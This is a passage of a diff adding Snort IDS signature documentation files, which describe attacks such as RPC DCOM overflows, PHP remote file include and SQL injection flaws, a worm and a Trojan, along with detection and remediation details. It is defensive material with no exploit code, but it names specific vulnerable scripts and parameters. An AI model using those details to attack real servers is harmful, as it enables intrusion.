+Affected Systems:
+Crystal Reports 8.5 JAVA SDK
+Crystal Reports RAS 8.5 for UNIX
+Crystal Reports 9.0
+Crystal Enterprise 9.0
+Crystal Reports 10
+Crystal Reports 10.0
+
+--
+Attack Scenarios:
+An attacker can request to view a file not in the web root
+directory, permitting unauthorized information disclosure.
+The viewed file will be deleted subsequently possibly causing
+harm to the server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0204
+
+Other:
+http://www.microsoft.com/security/bulletins/200406_crystal.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/887.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+887
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+WWW-SQL:
+http://grox.net/doc/web/www-sql.html
+
+--
--- /dev/null
+++ b/doc/signatures/122-15.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-15
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip
+filtered protocol sweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/3262.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3262
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2708.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2708
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure begin_flavor_change
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000402.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000402
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "event.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "event.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/725.txt
@@ -0,0 +1,91 @@
+Rule:
+
+--
+Sid:
+725
+
+
+--
+Summary:
+This event is generated when worm activity is detected. More specifcally
+this event indicates possible "My Romeo" propogation.
+
+--
+Impact:
+Serious. The victim host may be infected with a worm.
+
+--
+Detailed Information:
+This worm propogates via electronic mail and exploits a known
+vulnerability in the way that versions of Microsoft Outlook and Internet
+Explorer handle trusted HTML pages. The worm is launched via a compiled
+HTML file (.chm) which is used by Microsoft WIndows Help.
+
+The executable part of the worm is called from within the trusted
+compiled HTML file. The worm attempts to propagate using hard coded
+addresses of SMTP servers.
+
+This worm is also Known As: Romeo and Juliet, W32/Verona, TrojBlebla.A
+
+--
+Affected Systems:
+	Microsoft Windows 9x
+	Microsoft Windows 2000
+
+--
+Attack Scenarios:
+Symantec Anti-Virus center states that the worm arrives as an email
+message that has an HTML body and two attachments named Myjuliet.chm
+and Myromeo.exe. The subject of the email is selected at random from
+the following set:
+
+Romeo&Juliet
+hello world
+subject
+ble bla, bee
+I Love You ;)
+sorry...
+Hey you !
+Matrix has you...
+my picture
+from shake-beer
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Legitimate electronic mail containing the known subject lines used by
+MyRomeo may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Use Anti-Virus software to detect and delete virus laden email.
+
+This worm makes changes to the system registry, removal of the affected
+registry keys should be done using an appropriate virus removal tool or
+by an experienced Windows administrator.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+McAfee
+http://vil.nai.com/vil/content/v_98894.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blebla.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000374.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000374
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_words.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_words.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000818.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000818
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Graffiti Forums" application running on a webserver. Access to the file "topics.php" with SQL commands being passed as the "f" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "f" parameter in the "topics.php" script used by the "Graffiti Forums" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Graffiti Forums
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1151.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1151
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/859.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+859
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/287.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+287
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+QUALCOMM Qpopper POP3 buffer overflow vulnerability in BSD operating 
+systems.
+
+--
+Impact:
+Remote execution of arbitrary code leading to remote root compromise.
+
+--
+Detailed Information:
+An exploit is available that takes advantage of a buffer overflow 
+vulnerability in QUALCOMM Qpopper POP3 mail server version 2.53 or 
+earlier. This exploit can be used to obtain root access to the 
+compromised server.
+
+--
+Affected Systems:
+BSD distributions that ship QUALCOMM Qpopper POP3 server version 2.53 or
+earlier.
+
+--
+Attack Scenarios:
+An attacker executes exploit code against a vulnerable server and 
+obtains root privileges on the compromised computer.
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of QUALCOMM Qpopper appropriate for your 
+BSD distribution.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+CERT
+http://www.cert.org/advisories/CA-1998-08.html
+
+--
--- /dev/null
+++ b/doc/signatures/2564.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2564
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the Symantec Firewall.
+
+--
+Impact:
+A successful attack may cause a buffer overflow, permitting the execution
+of arbitrary code on the vulnerable host.
+
+--
+Detailed Information:
+There is a vulnerability in the way the Symantec Firewall handles NetBIOS
+Name Service response packets.  If an attacker crafts a malicious UDP NetBIOS
+Name Service unsolicited response to a vulnerable Symantec Firewall that does
+not block port 137, it is possible to cause a buffer overflow and execute
+abitrary code with kernel privileges.  The vulnerability exists because of
+improper validation of the length field value for the NetBIOS name returned.
+The default configuration does not allow UDP port 137 traffic and should
+not be exploitable if UDP port 137 is blocked.
+
+--
+Affected Systems:
+Symantec Norton Internet Security and Professional 2002,2003,2004
+Symantec Norton Personal Firewall 2002,2003,2004
+Symantec Norton AntiSpam 2004
+Symantec Client Firewall 5.01, 5.1.1
+Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)
+
+--
+Attack Scenarios:
+An attacker can craft a malicious UDP NetBIOS Name Service response,
+possibly causing a buffer overflow and the subsequent execution of
+arbitrary code with kernel privileges on an exploitable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0444
+
+Bugtraq:
+http://www.securityfocus.com/bid/10333
+
+Misc:
+http://www.eeye.com/html/Research/Advisories/AD20040512A.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000398.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000398
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "frchart.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "frchart.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000599.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000599
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_edit.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_edit.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/208.txt
@@ -0,0 +1,89 @@
+Rule:
+
+--
+Sid:
+208
+
+--
+Summary:
+Phase0 is a Trojan Horse offering the attacker control of the victim 
+host. This event is generated when the victim server replies to an 
+attackers client connection request.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to. This Trojan
+also has the ability to delete data, steal passwords and disable the
+machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+
+The Trojan changes system registry settings to add the PhaseZero server
+to programs normally started on boot. Due to the nature of this Trojan
+it is unlikely that the attacker's client IP address has been spoofed.
+
+The default name of the server application is MsgServ.
+
+Server Port: 555 although this can be changed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added:
+
+	MsgServ
+
+Delete the server program msgsvr32.exe and/or ServerS.exe.
+
+A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Dark-e
+http://www.dark-e.com/archive/trojans/phase/
+
+--
--- /dev/null
+++ b/doc/signatures/3240.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3240
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1525.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1525
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1861.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1861
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1996.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1996
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
